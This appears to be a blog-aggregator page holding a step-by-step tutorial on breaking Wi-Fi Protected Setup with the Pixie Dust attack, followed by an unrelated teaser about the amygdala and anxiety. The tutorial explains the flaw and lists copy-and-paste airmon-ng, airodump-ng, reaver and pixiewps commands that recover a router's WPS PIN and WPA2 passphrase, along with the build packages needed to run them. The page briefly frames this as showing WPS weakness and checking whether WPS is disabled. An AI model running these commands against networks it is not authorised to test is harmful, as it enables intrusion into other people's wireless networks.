Social Engineering Blogs

An Aggregator for Blogs About Social Engineering and Related Fields

How To Crack WPS with Pixie Dust … Offline Attacking

In this post we are looking at how vulnerable WPS makes your Access Point. WiFi Protected Setup makes it nice and easy for you to connect to your wireless devices by using a simple pin number, instead of your hard to guess passphrase. The issue is that this means your secure 32 character passphrase is about as much use a chocolate fireguard, as instead of taking potentially years to crack, you can attack the pin number which only has 11,000 iterations and this can be cracked in hours (even with timeouts and other controls in place).

In this video we will show how a vulnerability in some of the chipsets of Wireless Access Points allows you to crack the WPS code in less than a second as well as revealing the WPA pin number. This attack is called the PixieDust attack, and it currently works on certain firmware on Broadcom, Realtek, Ralink and MediaTek chipsets. In the video this is demonstrated on an older BT HomeHub 3 which is using a Realtek chipset.

The way this works is that the Enrollee Hashes (E-Hash1 / E-Hash2) are supposed to be secret hashes, but when they are disclosed we can use them along with the Enrolle and Registrar Public Keys, along with the E & R Nonces and the Auth Key to decipher the WPS PIN Key.

Just to provide some comparison, using the WPS PixieDust attack we got the PIN and then the WPA2 Passphrase in less than a second. Stealing the WPA2 Hash and attacking this directly with a single GPU the time estimated to crack based on knowing its Alpha Numeric with no special characters is 853,399 days, 2 hours and 44 minutes, so year WPS add some weakness to your hardened access point :)

Below is the code used during the above video, you can use this easily copy and paste with your own information.

iwconfig

airmon-ng start wlan1

airmon-ng check kill

airodump-ng wlan1mon –wps

reaver -i wlan1mon -c -b -vv

pixiewps -e -r -s -z -a -n

reaver -i wlan1mon -c -b -vv -K 1

If you are looking to do this on Ubuntu and not Kali, you will need the following packages (cheers Matt):

apt-get install install build-essential libnl-3-dev libnl-genl-3-dev

wget http://download.aircrack-ng.org/aircrack-ng.1.2-rc2.tar.gz

git clone https://github.com/t6x/reaver-wps-fork-t6x

git clone https://github.com/wiire/pixiewps

Finally, in the WPS column you need to be checking for one of the following to make sure the Access Point has WPS enabled, if it isnt its not supported on the device, or you have successfully disabled it. 1.0, LAB, PBC, NFC, PIN,

Understanding the Early-Life Origins of Extreme Anxiety—Role of the Amgydala

The internalizing disorders—anxiety and depression—are a major human blight. According to the World Health Organization and National Institute of Mental Health, depression is responsible for more years lost to illness and disability than any other medical condition, including such familiar scourges as diabetes and chronic respiratory disorders. Anxiety disorders are the most common family of psychiatric […]

The post Understanding the Early-Life Origins of Extreme Anxiety—Role of the Amgydala appeared first on Emotion News.